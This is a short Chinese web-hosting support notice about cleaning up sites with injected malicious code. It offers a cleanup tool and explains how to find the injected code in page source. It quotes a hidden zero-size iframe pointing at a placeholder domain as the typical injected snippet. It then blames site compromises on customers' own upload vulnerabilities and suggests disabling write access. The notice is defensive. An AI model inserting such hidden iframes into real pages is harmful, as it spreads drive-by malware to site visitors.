被挂马后
下载本工具:http://www.84684.net/download/del.rar
放在空间里 运行即可 如http://www.84684.net/1.asp
使用前一定要备份好Access数据库,否则数据损坏我们不负责.
如果不知道具体恶意代码,可以在报毒的页面上右点,查看源文件,一般在最底端就会有恶意代码
如:<iframe src=http://www.xxxx.com/ad.htm frameBorder=0 width=0 height=0></iframe>
或者在源文件里按CTRL+F 查找ifr 看width和height都是0的 一般就是恶意代码
部分客户质疑是因为我们服务器的安全导致自己网站被挂马
1:我们的服务器目前数年还没有过一次被攻破的记录,我们遇到过很多被挂马的用户最终都证明是自己的程序漏洞引起的
2:如果怀疑是服务器整体被挂马,您可以向我们询问或者自己查找服务器上其他站是否被挂马
3:挂马是通过程序的上传漏洞,上传木马文件控制整个FTP后进行批量挂马,如果您不会修改程序则最好是更换程序,网站想做大肯定还是要买正版程序
4:如果您即不会修改程序,也不想更换程序,可以通过登陆控制面板,“主机管理-管理-设置写入权限”进行禁止写入(数据库目录和上传目录要单独开启,否则程序会异常),这个功能也会禁止您自己的FTP操作修改,如果需要修改时可以恢复写入权限再修改。